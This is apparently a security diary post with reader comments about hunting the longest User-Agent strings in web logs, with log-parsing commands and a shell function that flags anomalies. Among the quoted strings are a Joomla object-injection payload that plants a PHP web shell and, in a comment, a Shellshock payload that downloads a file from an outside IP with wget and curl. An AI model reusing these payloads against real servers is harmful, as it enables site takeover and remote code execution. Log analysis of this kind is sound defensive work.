What is your most unusual User-Agent?
When looking at my web logs, I am always out to hunt for anomalies. Today, after seeing some odd and long user agents, I figured it would be fun to look for the longest ones that I can find in my logs. First of all: how?
First, I am extracting the User-Agent string from my web server access log:
cut -f 6 -d'"' access_log > /tmp/useragents
(This may look different for you if you use a different log format.)
Next, sorting the result by line length:
sort -u /tmp/useragents | awk '{ print length, $0 }' | sort -n -s | cut -d" " -f2-
So finally, some of the "winners":
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0 OWASMIME/4.0500 (...)
OWASMIME/4.0500 is repeated many times. No idea what this is about. A buggy script?
}__test|O:21:\x22JDatabaseDriverMysqli\x22:3:{s:2:\x22fc\x22; O:17:\x22JSimplepieFactory\x22:0:{}s:21:\x22\x5C0\x5C0\x5C0disconnectHandlers\x22; a:1:{i:0;a:2:{i:0;O:9:\x22SimplePie\x22:5:{s:8:\x22sanitize\x22; O:20:\x22JDatabaseDriverMysql\x22:0:{}s:8:\x22feed_url\x22; s:254:\x22file_put_contents($_SERVER[\x22DOCUMENT_ROOT\x22].chr(47).\x22images\x22. chr(47).\x22main.php\x22,\x22|=|\x5Cx3C\x22.chr(63).\x22php \x5Cx24mujj=\x5Cx24_POST['@123'];if(\x5Cx24mujj!='') {\x5Cx24xsser=base64_decode(\x5Cx24_POST['z0']); @eval(\x5C\x22\x5C\x5C\x5Cx24safedg=\x5Cx24xsser;\x5C\x22);}\x22); JFactory::getConfig();exit;\x22;s:19:\x22cache_name_function\x22; s:6:\x22assert\x22;s:5:\x22cache\x22;b:1;s:11:\x22cache_class\x22; O:20:\x22JDatabaseDriverMysql\x22:0:{}}i:1;s:4:\x22init\x22;}}s:13:\x22\x5C0\x5C0\x5C0connection\x22;b:1;}~\xD9
An exploit for an OLD Joomla issue if I remember right? This stuff still works?
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; Tablet PC 2.0; GWX:MANAGED; GWX:DOWNLOADED; GWX:QUALIFIED; InfoPath.3; MALCJS; Microsoft Outlook 15.0.4833; Microsoft Outlook 15.0.4833; Microsoft Outlook 15.0.4833; Microsoft Outlook 15.0.4833; Microsoft Outlook 15.0.4833; Microsoft Outlook 15.0.4833; Microsoft Outlook 15.0.4833; Microsoft Outlook 15.0.4833; Microsoft Outlook 15.0.4833; ms-office; MSOffice 15)
Again. Lots of duplicate content. Do you REALLY have to tell me what version of Outlook you are running? I know you are proud of your tablet...
Oddly enough, no shell shock today.
What is your longest User-Agent if you search your weblogs?
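The same hunt as a reusable function, added here as an example that is not part of the original diary: it counts each unique User-Agent, ranks by length, and tags the two oddities seen above (repeated tokens, and code-like characters). It assumes the "combined" log format; the names ua_report and sample_log, the flag names and the thresholds are illustrative choices, and the log lines are constructed.

```shell
#!/bin/sh
# Rank unique User-Agents by length and tag the oddities the diary notes.
TAB=$(printf '\t')

# ua_report FILE [TOP_N] -> length<TAB>hits<TAB>flags<TAB>user-agent
# Assumption: "combined" log format, User-Agent is the last quoted field.
ua_report() {
    awk '
    {
        # Fields are separated by quote-space-quote; quotes inside a field
        # are logged escaped (\" or \x22), so they never match the separator.
        n = split($0, f, "\" \"")
        if (n < 2) next                  # not a combined-format line
        ua = f[n]
        sub(/"[ \t\r]*$/, "", ua)        # drop the closing quote
        hits[ua]++                       # de-duplicate regardless of order
    }
    END {
        for (ua in hits) {
            flags = ""
            # REPEAT: a token of 6+ chars occurs 3+ times (buggy client).
            m = split(ua, tok, /[ ;]+/)
            split("", seen)              # portable way to empty an array
            rep = 0
            for (i = 1; i <= m; i++)
                if (length(tok[i]) >= 6 && ++seen[tok[i]] >= 3) rep = 1
            if (rep) flags = "REPEAT"
            # CODE: braces, $, backticks or \xNN escapes are not browser
            # User-Agent material; typical of injection attempts.
            if (ua ~ /[{}$`]|\\x[0-9A-Fa-f][0-9A-Fa-f]/)
                flags = (flags == "" ? "" : flags ",") "CODE"
            if (flags == "") flags = "-"
            printf "%d\t%d\t%s\t%s\n", length(ua), hits[ua], flags, ua
        }
    }' "$1" | sort -t "$TAB" -k1,1nr | head -n "${2:-10}"
}

# Constructed sample log: documentation IPs, made-up requests.
sample_log() {
    cat <<'EOF'
192.0.2.10 - - [29/Jun/2016:10:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:47.0) Gecko/20100101 Firefox/47.0"
192.0.2.10 - - [29/Jun/2016:10:00:02 +0000] "GET /a.css HTTP/1.1" 200 90 "http://example.test/" "Mozilla/5.0 (X11; Linux x86_64; rv:47.0) Gecko/20100101 Firefox/47.0"
198.51.100.7 - - [29/Jun/2016:10:01:00 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Tablet PC 2.0; Microsoft Outlook 15.0.4833; Microsoft Outlook 15.0.4833; Microsoft Outlook 15.0.4833; ms-office)"
203.0.113.5 - - [29/Jun/2016:10:02:00 +0000] "GET / HTTP/1.1" 404 0 "-" "}__test|O:8:\x22Example\x22:0:{}"
EOF
}
# Usage: sample_log > /tmp/sample_log && ua_report /tmp/sample_log 5
```

Because the count is kept per unique string, a short User-Agent tagged CODE still surfaces even when it is nowhere near the top of the length ranking; raise TOP_N to see it.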
Comments
Longest user agent:
Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
Anonymous
Jun 29th 2016
8 years ago
()+{+:;};/usr/bin/perl+-e+'print+"Content-Type:+text/plain\r\n\r\nXSUCCESS!";system("+wget+http://204.232.209.188/images/freshcafe/slice_30_192.png+;+curl+-O+http://204.232.209.188/images/freshcafe/slice_30_192.png+;+fetch+http://204.232.209.188/images/freshcafe/slice_30_192.png+;+lwp-download++http://204.232.209.188/images/freshcafe/slice_30_192.png+;+GET+http://204.232.209.188/images/freshcafe/slice_30_192.png+;+lynx+http://204.232.209.188/images/freshcafe/slice_30_192.png++");'
Longest one this month is someone who's very proud of their tablet:
Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+6.1;+Trident/7.0;+SLCC2;+.NET+CLR+2.0.50727;+.NET+CLR+3.5.30729;+.NET+CLR+3.0.30729;+Media+Center+PC+6.0;+MDDR;+InfoPath.2;+.NET4.0C;+.NET4.0E;+MS-RTC+LM+8;+Tablet+PC+2.0;+GWX:MANAGED;+GWX:QUALIFIED;+Microsoft+Outlook+14.0.7169;+ms-office;+MSOffice+14)
Anonymous
Jun 29th 2016
8 years ago
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; Tablet PC 2.0; McAfee; InfoPath.3; GWX:DOWNLOADED; GWX:RESERVED; GWX:QUALIFIED; ms-office; MSOffice
or
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.9) Gecko/20100101 Goanna/2.0 Firefox/38.9 PaleMoon/26.2.2Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.9) Gecko/20100101 Goanna/2.0 Firefox/38.9 PaleMoon/26.2.2Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.9) Gecko/201001
Anonymous
Jun 29th 2016
8 years ago
426 chars:
Mozilla/5.0 (Linux; U; Android 6.0; zh-cn; Doov L5P_64_M Build/MRA58K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/1.0.0.100 U3/0.8.0 Mobile Safari/534.30 Tanggula/0.1.0 WebLight/1.4.5Mozilla/5.0 (Linux; U; Android 6.0; zh-cn; Doov L5P_64_M Build/MRA58K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/1.0.0.100 U3/0.8.0 Mobile Safari/534.30 Tanggula/0.1.0 WebLight/1.4.5 xiaoyun_AppSearch/2.1.5
Anonymous
Jun 29th 2016
8 years ago
Agents... lots of Mobile crawlers, etc:
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; elertz 2.4.179[128]; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
SAMSUNG-SGH-E250/1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0 (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)
Mozilla/5.0 CommonCrawler Node MFEM74FEY7ZZZMQ7DWUZYSIZMHWMR73C7XMMOCFILOY4ZSCAEWCZBJGMOFT6EHU.MHXEUGHG6.RFYCW6TUULJSQE7PNQXZBMOMZAVVIKEMOSWSC6FGBNQTWGNX.cdn0.common.crawl.zone
Mozilla/5.0 (iPhone; CPU iPhone OS 8_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B411 Safari/600.1.4 (compatible; YandexMobileBot/3.0; +http://yandex.com/bots)
Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)
Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
Mozilla/5.0 (compatible; SurdotlyBot/1.0; +http://sur.ly/bot.html; Linux; Android 4; iPhone; CPU iPhone OS 6_0_1 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A523 Safari/8536.25
Anonymous
Jun 29th 2016
8 years ago
Anonymous
Jul 1st 2016
8 years ago